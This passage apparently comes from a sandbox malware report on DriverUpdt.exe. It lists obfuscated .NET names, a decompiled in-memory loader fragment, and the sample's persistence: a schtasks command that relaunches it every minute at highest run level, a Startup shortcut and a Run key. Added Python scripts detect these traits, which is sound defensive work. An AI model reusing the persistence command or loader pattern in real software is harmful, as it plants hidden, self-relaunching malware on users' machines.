                      Source: DriverUpdt.0.dr, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.cs | High entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
                      Source: DriverUpdt.0.dr, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.cs | High entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: DriverUpdt.0.dr, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.cs | High entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | High entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | High entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | High entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: DriverUpdt.0.dr, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.cs | High entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.cs | High entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.cs | High entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, ItGbRSbZFa55CcXB.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.cs | High entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.cs | High entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.cs | High entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | High entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | High entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | High entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.cs | High entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | File created: C:\Users\user\AppData\Roaming\DriverUpdt
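The decompiled fragments above show the loader chain that drives the obfuscation findings: a base64 string is decoded with Convert.FromBase64String, the resulting bytes are handed to System.AppDomain.Load(byte[]) so the inner assembly is mapped from memory rather than from a file on disk, and a member of it is then called by name through the VB.NET late-binding helper NewLateBinding.LateCall(..., "Invoke", ...). The randomised class and method names are what the "high entropy of concatenated method names" lines measure. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it reproduces both static heuristics (Shannon entropy over concatenated method names, plus a scan of decompiled text for the decode/load-from-memory/invoke API strings) on the names and fragments quoted in this section, with a small constructed benign name set for comparison. The 5.0-bit threshold, the "random-looking name" rule and the indicator list are this example's own assumptions, not Joe Sandbox's.

```python
"""Static triage heuristics for a decompiled .NET sample (added example, not
part of the Joe Sandbox report or of the DriverUpdt sample)."""
import math
from collections import Counter

# Method names quoted from the report for class 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.cs
OBFUSCATED_NAMES = [
    "opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl", "a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5",
    "_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7", "ATm6kN4FZHBZVfWhdbiVl10mjT",
    "VD7JRi8WA6tNsZYOCrtsYfuvZV", "_55RVfoVYvecnmerTVPbxQt16vz",
    "fW22Fiwx3IERa8JUW4qOSSwnFO", "QPB9P6GSY9LK8xuIoVRml4j6MF",
    "gzqTCi4f8OAhTPJItNGigaUu0T", "XpA5SrtJGG2wBuUMwtKaY0RP2E",
]

# Constructed comparison set: the framework names the report lists for
# ItGbRSbZFa55CcXB.cs plus a few ordinary member names (assumption).
BENIGN_NAMES = [
    "Equals", "GetHashCode", "GetType", "ToString", "Create__Instance__",
    "Dispose__Instance__", "Dispose", "Initialize", "Main", "Run",
]

# Decompiled fragments quoted from the report (class cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs)
DECOMPILED_SNIPPET = '''
NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
'''

# API strings that together form the decode -> load-from-memory -> invoke chain (assumed list).
REFLECTIVE_LOAD_INDICATORS = (
    "Convert.FromBase64String(", "AppDomain.Load(", "Assembly.Load(",
    "NewLateBinding.LateCall(", '"Invoke"', "GetMethod(", "EntryPoint",
)

ENTROPY_THRESHOLD = 5.0  # bits per char; this example's assumption, not Joe Sandbox's value


def shannon_entropy(text: str) -> float:
    """Shannon entropy, in bits per character, of the given string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def name_entropy(names) -> float:
    """Entropy of the concatenated method names, as the report's heuristic measures it."""
    return shannon_entropy("".join(names))


def looks_random(name: str) -> bool:
    """A long identifier mixing cases and digits, or one starting with '_' plus a digit
    (how obfuscators turn a random string into a legal C# identifier)."""
    if name.lstrip("_")[:1].isdigit():
        return True
    return (len(name) >= 20 and any(ch.isdigit() for ch in name)
            and any(ch.isupper() for ch in name) and any(ch.islower() for ch in name))


def random_name_fraction(names) -> float:
    return sum(looks_random(n) for n in names) / len(names) if names else 0.0


def scan_indicators(source: str) -> list:
    """Reflective-loading API strings present in decompiled source, sorted."""
    return sorted(ind for ind in REFLECTIVE_LOAD_INDICATORS if ind in source)


def triage(names, source: str) -> dict:
    """Combine both heuristics into one verdict for a class or assembly."""
    entropy = name_entropy(names)
    indicators = scan_indicators(source)
    loads_from_memory = any(i in indicators for i in ("AppDomain.Load(", "Assembly.Load("))
    return {
        "name_entropy": round(entropy, 3),
        "random_name_fraction": random_name_fraction(names),
        "indicators": indicators,
        "suspicious": entropy >= ENTROPY_THRESHOLD
                      or (loads_from_memory and "Convert.FromBase64String(" in indicators),
    }


if __name__ == "__main__":
    print(triage(OBFUSCATED_NAMES, DECOMPILED_SNIPPET))
    print(triage(BENIGN_NAMES, 'static void Main() { Console.WriteLine("hi"); }'))
```

Running the block flags the report's class (entropy well above the threshold, every name random-looking, four of the indicator strings present) and passes the benign set. In practice the name list would come from the assembly's metadata tables (for instance via dnlib, ILSpy or dnfile) rather than being pasted in; the heuristics themselves do not change.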

                      Boot Survival

                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverUpdt
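The entries above are the sample's persistence set: a scheduled task named DriverUpdt that re-launches the dropped copy in AppData\Roaming every minute and requests the highest run level available to the account (/RL HIGHEST), a shortcut in the per-user Startup folder, and an HKCU Run value, all pointing at C:\Users\user\AppData\Roaming\DriverUpdt. Note that the dropped file has no extension yet is a .NET executable (the Section loaded lines earlier in this report show it pulling in mscoree.dll), so extension-based filters miss it. Each mechanism on its own is common in legitimate software; the high-frequency trigger, the user-writable target path and the use of three mechanisms by one process are what a detection should key on. The Python below is an added example, not from the report: it applies those checks to a few constructed Sysmon-style event records modelled on the lines above, plus two constructed benign events, and correlates findings per originating process. The field names, the event records, the five-minute interval cutoff and the "two mechanisms = high" rule are this example's own assumptions.

```python
"""Persistence-triad detection over constructed Sysmon-style events (added
example; the records below are modelled on the report's Boot Survival entries
and are not real telemetry)."""
import re

# A path under a user profile that the user can write to without elevation.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)

_SC = re.compile(r"/sc\s+(\w+)", re.IGNORECASE)
_MO = re.compile(r"/mo\s+(\d+)", re.IGNORECASE)
_RL = re.compile(r"/rl\s+highest", re.IGNORECASE)
_TR = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def schtasks_findings(cmdline: str) -> list:
    """Flag a schtasks /create command line that re-launches an untrusted binary aggressively."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return []
    findings = []
    m = _TR.search(cmdline)
    target = (m.group(1) or m.group(2) or "") if m else ""
    sc, mo = _SC.search(cmdline), _MO.search(cmdline)
    if sc and sc.group(1).lower() == "minute":
        interval = int(mo.group(1)) if mo else 1  # schtasks defaults /mo to 1
        if interval <= 5:
            findings.append(f"re-runs every {interval} minute(s)")
    if _RL.search(cmdline):
        findings.append("requests highest run level (/RL HIGHEST)")
    if USER_WRITABLE.search(target):
        findings.append("action lives in a user-writable profile directory")
    if target and "." not in target.rsplit("\\", 1)[-1]:
        findings.append("action has no file extension")
    return findings


def run_key_findings(key: str, data: str) -> list:
    """Flag an autostart Run value whose command points into the user profile."""
    if RUN_KEY.search(key) and USER_WRITABLE.search(data):
        return ["Run value points into a user-writable profile directory"]
    return []


def startup_findings(path: str) -> list:
    """Flag a shortcut dropped into the per-user Startup folder."""
    return ["shortcut written to Startup folder"] if STARTUP_LNK.search(path) else []


def correlate(events) -> dict:
    """Group findings by the responsible process: {actor: {mechanism: [findings]}}."""
    result = {}
    for ev in events:
        if ev["type"] == "ProcessCreate":  # the parent that spawned schtasks is the actor
            actor, mech, f = ev["parent"], "scheduled_task", schtasks_findings(ev["cmdline"])
        elif ev["type"] == "RegistryValueSet":
            actor, mech, f = ev["image"], "run_key", run_key_findings(ev["key"], ev["data"])
        elif ev["type"] == "FileCreate":
            actor, mech, f = ev["image"], "startup_folder", startup_findings(ev["target"])
        else:
            continue
        if f:
            result.setdefault(actor, {})[mech] = f
    return result


def verdict(correlated: dict) -> dict:
    """Two or more independent autostart mechanisms from one process is high confidence."""
    return {actor: ("high" if len(m) >= 2 else "low") for actor, m in correlated.items()}


# Constructed events modelled on the report; the first three mirror the sample's behaviour.
SAMPLE = r"C:\Users\user\Desktop\DriverUpdt.exe"
EVENTS = [
    {"type": "ProcessCreate", "parent": SAMPLE, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"'},
    {"type": "FileCreate", "image": SAMPLE,
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk"},
    {"type": "RegistryValueSet", "image": SAMPLE,
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdt",
     "data": r"C:\Users\user\AppData\Roaming\DriverUpdt"},
    # Constructed benign noise: a vendor installer with a daily task and a Run value under Program Files.
    {"type": "ProcessCreate", "parent": r"C:\Program Files\Vendor\setup.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /sc daily /st 03:00 /tn "VendorUpdate" /tr "C:\Program Files\Vendor\updater.exe"'},
    {"type": "RegistryValueSet", "image": r"C:\Program Files\Vendor\setup.exe",
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "data": r"C:\Program Files\Vendor\tray.exe"},
]

if __name__ == "__main__":
    hits = correlate(EVENTS)
    for actor, mechanisms in hits.items():
        print(f"{verdict(hits)[actor].upper()}: {actor}")
        for mech, findings in mechanisms.items():
            print(f"  {mech}: {'; '.join(findings)}")
```

Only DriverUpdt.exe surfaces, with all three mechanisms and four separate findings on the schtasks command line; the vendor installer produces nothing. For live hunting the same checks map onto Sysmon event IDs 1 (process creation), 11 (file create) and 13 (registry value set), or onto the output of schtasks /query /xml and Get-ItemProperty on the Run keys.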

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
